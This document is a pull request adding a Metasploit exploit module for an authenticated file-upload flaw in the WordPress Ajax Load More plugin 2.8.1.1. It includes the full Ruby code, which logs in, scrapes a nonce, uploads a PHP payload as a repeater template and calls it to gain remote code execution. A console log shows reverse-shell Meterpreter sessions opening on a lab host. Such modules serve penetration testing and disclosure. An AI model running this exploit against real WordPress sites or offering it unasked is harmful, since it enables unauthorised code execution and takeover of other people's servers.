### PR TITLE
Add WP Ajax Load More Plugin File Upload Vuln.

### DIFF
--- a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb
@@ -1,0 +1,120 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress Ajax Load More PHP Upload Vulnerability',
+      'Description'    => %q{
+        This module exploits an arbitrary file upload in the WordPress Ajax Load More
+        version 2.8.1.1. It allows to upload arbitrary php files and get remote code
+        execution. This module has been tested successfully on WordPress Ajax Load More
+        2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.
+      },
+      'Author'         =>
+        [
+          'Unknown', # Identify yourself || send an PR here
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['WPVDB', '8209']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Ajax Load More 2.8.1.1', {}]],
+      'DisclosureDate' => 'Oct 10 2015',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
+        OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
+      ], self.class
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('ajax-load-more', '2.8.1.2')
+  end
+
+  def username
+    datastore['WP_USERNAME']
+  end
+
+  def password
+    datastore['WP_PASSWORD']
+  end
+
+  def get_nonce(cookie)
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => normalize_uri(wordpress_url_backend, 'admin.php'),
+      'vars_get'  => {
+        'page'    => 'ajax-load-more-repeaters'
+      },
+      'cookie'    => cookie
+    )
+
+    if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
+      return Regexp.last_match[1]
+    else
+      return nil
+    end
+  end
+
+  def exploit
+    vprint_status("#{peer} - Trying to login as #{username}")
+    cookie = wordpress_login(username, password)
+    fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?
+
+    vprint_status("#{peer} - Trying to get nonce")
+    nonce = get_nonce(cookie)
+    fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?
+
+    vprint_status("#{peer} - Trying to upload payload")
+    filename = 'default.php'
+
+    print_status("#{peer} - Uploading payload")
+    res = send_request_cgi(
+      'method'      => 'POST',
+      'uri'         => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
+      'vars_post'   => {
+        'action'    => 'alm_save_repeater',
+        'value'     => payload.encoded,
+        'repeater'  => 'default',
+        'type'      => 'default',
+        'alias'     => '',
+        'nonce'     => nonce
+      },
+      'cookie'      => cookie
+    )
+
+    if res
+      if res.code == 200 && res.body.include?('Template Saved Successfully')
+        register_files_for_cleanup(filename)
+      else
+        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
+      end
+    else
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+    end
+
+    print_status("#{peer} - Calling uploaded file")
+    send_request_cgi(
+      'uri'    => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
+    )
+  end
+end


### PR DESCRIPTION
#### Add WordPress Plugin Ajax Load More Auth File Upload Vulnerability

  Application: WordPress Plugin 'Ajax Load More' 2.8.1.1
  Homepage: https://wordpress.org/plugins/ajax-load-more/
  Source Code: https://downloads.wordpress.org/plugin/ajax-load-more.2.8.0.zip
  Active Installs (wordpress.org): 10,000+
  References: https://wpvulndb.com/vulnerabilities/8209
#### Vulnerable packages*

  2.8.1.1
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):

```
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf>  use exploit/unix/webapp/wp_ajax_load_more_file_upload 
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  info

       Name: Wordpress Ajax Load More PHP Upload Vulnerability
     Module: exploit/unix/webapp/wp_ajax_load_more_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-10-10

Provided by:
  Unknown
  Roberto Soares Espreto <robertoespreto@gmail.com>

Available targets:
  Id  Name
  --  ----
  0   Ajax Load More 2.8.1.1

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                         yes       The target address
  RPORT        80               yes       The target port
  TARGETURI    /                yes       The base path to the wordpress application
  VHOST                         no        HTTP server virtual host
  WP_PASSWORD                   yes       Valid password for the provided username
  WP_USERNAME                   yes       A valid username

Payload information:

Description:
  This module exploits an arbitrary file upload in the WordPress Ajax 
  Load More version 2.8.1.1. It allows to upload arbitrary php files 
  and get remote code execution. This module has been tested 
  successfully on WordPress Ajax Load More 2.8.0 with Wordpress 4.1.3 
  on Ubuntu 12.04/14.04 Server.

References:
  https://wpvulndb.com/vulnerabilities/8209

msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  show options 

Module options (exploit/unix/webapp/wp_ajax_load_more_file_upload):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                         yes       The target address
   RPORT        80               yes       The target port
   TARGETURI    /                yes       The base path to the wordpress application
   VHOST                         no        HTTP server virtual host
   WP_PASSWORD                   yes       Valid password for the provided username
   WP_USERNAME                   yes       A valid username


Exploit target:

   Id  Name
   --  ----
   0   Ajax Load More 2.8.1.1


msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  set RHOST 192.168.0.14
RHOST => 192.168.0.14
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  set WP_USERNAME espreto
WP_USERNAME => espreto
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  set WP_PASSWORD P@ssW0rd
WP_PASSWORD => P@ssW0rd
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  check 
[*] 192.168.0.14:80 - The target appears to be vulnerable.
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  exploit 

[*] Started reverse handler on 192.168.0.7:4444 
[*] 192.168.0.14:80 - Uploading payload
[*] 192.168.0.14:80 - Calling uploaded file
[*] Sending stage (33068 bytes) to 192.168.0.14
[*] Meterpreter session 1 opened (192.168.0.7:4444 -> 192.168.0.14:42868) at 2015-10-17 13:21:05 -0300
[+] Deleted default.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-62-generic #102~precise1-Ubuntu SMP Wed Aug 12 14:11:43 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 12445 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^Z
Background channel 0? [y/N]  y
meterpreter > background
[*] Backgrounding session 1...
msfdevel 192.168.0.7 shell[s]:1 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  set VERBOSE true
VERBOSE => true
msfdevel 192.168.0.7 shell[s]:1 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  exploit 

[*] Started reverse handler on 192.168.0.7:4444 
[*] 192.168.0.14:80 - Trying to login as espreto
[*] 192.168.0.14:80 - Trying to get nonce
[*] 192.168.0.14:80 - Trying to upload payload
[*] 192.168.0.14:80 - Uploading payload
[*] 192.168.0.14:80 - Calling uploaded file
[*] Sending stage (33068 bytes) to 192.168.0.14
[*] Meterpreter session 2 opened (192.168.0.7:4444 -> 192.168.0.14:42935) at 2015-10-17 13:24:03 -0300
[+] Deleted default.php

meterpreter > background 
[*] Backgrounding session 2...
msfdevel 192.168.0.7 shell[s]:2 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  
```
